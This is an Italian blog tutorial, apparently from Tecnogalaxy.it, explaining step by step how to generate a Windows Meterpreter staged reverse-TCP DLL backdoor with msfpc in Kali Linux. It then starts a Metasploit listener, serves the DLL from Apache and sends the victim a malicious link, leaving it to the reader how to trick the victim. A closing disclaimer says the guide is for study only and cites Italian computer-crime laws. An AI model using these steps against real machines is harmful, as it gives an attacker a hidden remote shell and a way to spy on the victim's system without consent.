
windows-meterpreter-staged-reverse-tcp-443-dll
In questo nuovo tutorial andremo a parlare della backdoor windows-meterpreter-staged-reverse-tcp-443-dll; essa fa sempre parte dell’insieme di payload che ci offre il nostro Msfvenom Payload Creator, contenuto in Kali Linux. Partiamo quindi con l’elencare la serie di procedimenti, che tuttavia sono simili alla maggiorparte dei miei precedenti articoli, sempre riguardanti MPC. Come primo passo apriamo la console del Payload Creator andando nel percorso Applicazioni>Strumenti di exploiting>MPC. Startato il programma digitiamo il comando /usr/bin/msfpc verbose loop “tuo indirizzo ip”
il quale creerà nella cartella “Home” tutti i payload che mette a disposizione il programma; a noi servirà solamente uno, in questo specifico caso. Per ottenere il nostro indirizzo ip, necessario per l’esecuzione del comando precedente, dobbiamo aprire un nuovo terminale e digitare il comando “ifconfig”.
Una volta eseguito il primo comando possiamo digitare msfconsole -q -r ‘/root/windows-meterpreter-staged-reverse-tcp-443-dll.rc’
il quale andrà a richiamare la console di Metasploit Framework e quindi metterà il terminale in ascolto, ovvero attenderà la captazione di dati provenienti dal PC della vittima una volta che vi si sarà stata installata la backdoor.
Ora passiamo nella cartella Home, dove è presente il file della backdoor che dobbiamo trasferire nel pc della vittima;
quindi prendiamo il file windows-meterpreter-staged-reverse-tcp-443.dll e portiamolo nel percorso computer>var>ww>html.
A questo punto possiamo aprire un ulteriore terminale ed eseguire il comando service apache2 start.
Adesso non ci rimane altro che creare un link maligno che invieremo alla vittima; una volta che il link sarà stato cliccato, dovrà essere scaricato sul dispositivo sottoposto all’attacco per poi essere aperto; una volta aperto, quindi, si verrà a creare la sessione con il terminale di metasploit che nel frattempo era in ascolto. Il link assume la seguente struttura: “indirizzo ip locale”/windows-meterpreter-staged-reverse-tcp-443.dll
dove al posto di “indirizzo ip locale” andremo a inserire appunto il nostro ip trovato precedentemente con il comando ifconfig; deciderete voi il modo migliore per far cascare la vittima nella trappola.
Se il procedimento viene svolto correttamente, si creerà una comunicazione segreta tra il nostro PC e il dispositivo remoto su cui è stata installata la nostra backdoor windows-meterpreter-staged-reverse-tcp-443-dll; se avete dubbi sui comandi potete sempre visualizzarli tramite il comando “help” digitato sullo stesso terminale di Metasploit in ascolto.
Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un’ incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
I PIÙ LETTI
ARTICOLI RECENTI